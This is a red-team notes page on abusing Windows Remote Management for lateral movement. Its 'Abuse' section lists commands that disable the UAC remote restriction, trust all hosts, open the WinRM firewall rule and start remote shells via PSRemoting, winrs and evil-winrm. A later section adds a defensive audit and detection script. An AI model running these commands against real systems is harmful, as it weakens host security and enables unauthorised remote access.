# winrm

WinRM (Windows Remote Management) is the Windows protocol for remote command execution.

In an AD environment, a domain account that belongs to the Remote Management Users group can connect to every computer where WinRM is enabled. For local Windows accounts, however, network connections are blocked by the UAC remote restriction: a local administrator other than the built-in Administrator account (RID 500) receives only a filtered, standard-user token when logging on over the network, so it cannot open a WinRM session.

If remote command execution with administrative privileges (High mandatory integrity level) is already possible on the target, the registry value below can be changed to allow network logons with a full-privilege token.

## Abuse

```powershell
# Disable the UAC remote restriction for local accounts
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

# Start the WinRM service and configure it
net start winrm
Set-Item WSMAN:\localhost\Client\TrustedHosts -Value "*" -Force
Set-NetFirewallRule -Name 'WINRM-HTTP-In-TCP' -RemoteAddress Any
```

{% tabs %}
{% tab title="Windows" %}

```powershell
# Synchronize the clock with the remote server (Kerberos tolerates only a small skew)
w32tm /config /manualpeerlist:"AD01.CONTOSO.COM" /syncfromflags:manual /update
w32tm /resync /force

# Obtain a remote shell with PSRemoting
$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('CONTOSO\Administrator', $pass)
Enter-PSSession -ComputerName DC01 -Credential $cred

# Run a single command without an interactive shell
winrs /r:http://<target-ip>:5985/wsman /u:<username> /p:<password> whoami
```

{% endtab %}

{% tab title="UNIX" %}

```bash
# Obtain a remote shell over WinRM
evil-winrm -i 192.168.1.11 -u Administrator -p 'Password123!'
```

{% endtab %}
{% endtabs %}
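From the defender's side, the three settings changed in the Abuse section (LocalAccountTokenFilterPolicy, TrustedHosts, and the scope of the inbound WinRM firewall rule) are worth auditing, and every shell obtained with Enter-PSSession, winrs or evil-winrm leaves a WSMan shell-creation event on the destination host. The following PowerShell is an added example written for this page, not code from the original page or from any of the referenced projects. It assumes it runs in an elevated session on the host being checked and that the Microsoft-Windows-WinRM/Operational log is enabled; the function names are my own.

```powershell
# Added example (not from the original page): audit a host for the WinRM
# settings the Abuse section changes, and list recent inbound WinRM shells.
# Assumes an elevated local session and an enabled WinRM operational log.

function Get-WinRmExposure {
    $findings = @()

    # 1. LocalAccountTokenFilterPolicy = 1 disables the UAC remote restriction,
    #    so every local admin gets a full-privilege token over the network.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $policy = (Get-ItemProperty -Path $key -Name LocalAccountTokenFilterPolicy `
               -ErrorAction SilentlyContinue).LocalAccountTokenFilterPolicy
    if ($policy -eq 1) {
        $findings += [pscustomobject]@{
            Check = 'LocalAccountTokenFilterPolicy'
            Value = $policy
            Risk  = 'UAC remote restriction disabled for local accounts'
            Fix   = "Remove-ItemProperty -Path '$key' -Name LocalAccountTokenFilterPolicy"
        }
    }

    # 2. TrustedHosts = * lets this machine's WinRM client send NTLM/Basic
    #    credentials to any host, including a rogue listener.
    $trusted = (Get-Item WSMan:\localhost\Client\TrustedHosts `
                -ErrorAction SilentlyContinue).Value
    if ($trusted -eq '*') {
        $findings += [pscustomobject]@{
            Check = 'TrustedHosts'
            Value = $trusted
            Risk  = 'Client trusts every host for non-Kerberos authentication'
            Fix   = 'Clear-Item WSMan:\localhost\Client\TrustedHosts -Force'
        }
    }

    # 3. An enabled inbound rule scoped to 'Any' accepts 5985/TCP from every network.
    $rule = Get-NetFirewallRule -Name 'WINRM-HTTP-In-TCP' -ErrorAction SilentlyContinue
    if ($rule -and $rule.Enabled -eq 'True') {
        $addr = ($rule | Get-NetFirewallAddressFilter).RemoteAddress
        if ($addr -contains 'Any') {
            $findings += [pscustomobject]@{
                Check = 'WINRM-HTTP-In-TCP'
                Value = ($addr -join ',')
                Risk  = 'WinRM reachable from any remote address'
                Fix   = "Set-NetFirewallRule -Name 'WINRM-HTTP-In-TCP' -RemoteAddress LocalSubnet"
            }
        }
    }
    return $findings
}

function Get-RecentWinRmShells {
    param([int]$Hours = 24)
    # Event ID 91 in the WinRM operational log is written on the destination
    # when a remote caller creates a WSMan shell (Enter-PSSession, winrs,
    # evil-winrm all go through this path). UserId is the caller's SID.
    $filter = @{
        LogName   = 'Microsoft-Windows-WinRM/Operational'
        Id        = 91
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated,
                      @{ n = 'CallerSid'; e = { $_.UserId } },
                      @{ n = 'Message';   e = { $_.Message.Trim() } }
}

# Usage: print weak settings with their remediation, then the last day of shells.
Get-WinRmExposure      | Format-Table -AutoSize -Wrap
Get-RecentWinRmShells  | Format-Table -AutoSize -Wrap
```

Correlating the Event ID 91 entries with Security log 4624 events of logon type 3 for the same time and account gives the source address of each session; on a host where WinRM is not expected to be used at all, any 91 event is worth an alert on its own.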

## References

{% embed url="https://dmcxblue.gitbook.io/red-team-notes/lateral-movement/windows-remote-management" %}

{% embed url="https://learn.microsoft.com/en-us/windows/win32/winrm/portal" %}

{% embed url="https://learn.microsoft.com/ko-kr/troubleshoot/windows-server/windows-security/user-account-control-and-remote-restriction" %}

